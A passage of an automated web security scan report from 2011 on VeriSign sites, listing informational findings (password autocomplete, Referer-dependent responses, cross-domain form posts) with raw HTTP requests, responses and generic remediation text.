Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:30:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:30:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 34637

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.43. https://www.verisign.com/products-services/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/products-services/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /products-services/index.html HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://securitycenter.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:46 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 107427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

   
       <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

12. Referer-dependent response previous next
There are 7 instances of this issue:

http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_red.png
http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_white.png
http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png
http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_left.png
http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_right.png
http://sales.liveperson.net/hc/2735064/

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

12.1. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_red.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.verisign.com
Path:	/authweb/global/assets/shared/images/nav/arrow_red.png

Request 1

GET /authweb/global/assets/shared/images/nav/arrow_red.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 1159

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>

The requested URL was not found on this server.

The link on the
<a href="http://blogs.verisign.com/%3ftid=footer">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://blogs.verisign.com/%3ftid=footer">that page</a>
about the error.

</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:10 2011<br />
Apache</span>
</address>
</body>
</html>

Request 2

GET /authweb/global/assets/shared/images/nav/arrow_red.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:16 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 996

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>

The requested URL was not found on this server.

If you entered the URL manually please check your
spelling and try again.

</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:16 2011<br />
Apache</span>
</address>
</body>
</html>

12.2. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_white.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.verisign.com
Path:	/authweb/global/assets/shared/images/nav/arrow_white.png

Request 1

GET /authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

Request 2

GET /authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

12.3. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.verisign.com
Path:	/authweb/global/assets/shared/images/nav/nav_grad.png

Request 1

GET /authweb/global/assets/shared/images/nav/nav_grad.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

Request 2

GET /authweb/global/assets/shared/images/nav/nav_grad.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:17 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 996

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>

The requested URL was not found on this server.

If you entered the URL manually please check your
spelling and try again.

</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:17 2011<br />
Apache</span>
</address>
</body>
</html>

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.verisign.com
Path:	/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png

Request 1

GET /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

Request 2

GET /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:26 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 996

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>

The requested URL was not found on this server.

If you entered the URL manually please check your
spelling and try again.

</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:26 2011<br />
Apache</span>
</address>
</body>
</html>

12.5. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_left.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.verisign.com
Path:	/authweb/global/assets/shared/images/nav/nav_left.png

Request 1

GET /authweb/global/assets/shared/images/nav/nav_left.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

Request 2

GET /authweb/global/assets/shared/images/nav/nav_left.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

12.6. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_right.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.verisign.com
Path:	/authweb/global/assets/shared/images/nav/nav_right.png

Request 1

GET /authweb/global/assets/shared/images/nav/nav_right.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

Request 2

GET /authweb/global/assets/shared/images/nav/nav_right.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

12.7. http://sales.liveperson.net/hc/2735064/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagInviteShown&lpCallId=320617608027-425706728594&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:11 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:34:11 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"320617608027-425706728594","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagInviteShown&lpCallId=320617608027-425706728594&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:25 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"320617608027-425706728594","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

13. Cross-domain POST previous next
There are 25 instances of this issue:

https://knowledge.verisign.ch/support/code-signing-support/index.html
https://knowledge.verisign.ch/support/code-signing-support/index.html
https://knowledge.verisign.ch/support/code-signing-support/index.html
https://knowledge.verisign.ch/support/digital-id-support/index.html
https://knowledge.verisign.ch/support/digital-id-support/index.html
https://knowledge.verisign.ch/support/mpki-support/index.html
https://knowledge.verisign.ch/support/mpki-support/index.html
https://knowledge.verisign.ch/support/ssl-certificates-support/index
https://knowledge.verisign.ch/support/ssl-certificates-support/index
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
https://knowledge.verisign.ch/support/trust-seal-support/index.html
https://knowledge.verisign.ch/support/trust-seal-support/index.html
http://query.verisign.ch/search
http://query.verisign.ch/search
https://renewals.symantec.com/renewals/chat_form.jsp
http://www.verisign.ch/
http://www.verisign.ch/
http://www.verisign.ch/contact-information/index.html
http://www.verisign.ch/contact-information/index.html
http://www.verisign.ch/corporate/index.html
http://www.verisign.ch/corporate/index.html
http://www.verisign.ch/trust-seal/index.html
http://www.verisign.ch/trust-seal/index.html

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

13.1. https://knowledge.verisign.ch/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/code-signing-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale
submit

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="sbmodulebody">


                               <form name="checkOrder" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post">
                                   Order Number<sup>
...[SNIP]...

13.2. https://knowledge.verisign.ch/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/code-signing-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

order_number
application_locale

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.3. https://knowledge.verisign.ch/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/code-signing-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

userName
password
submit

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

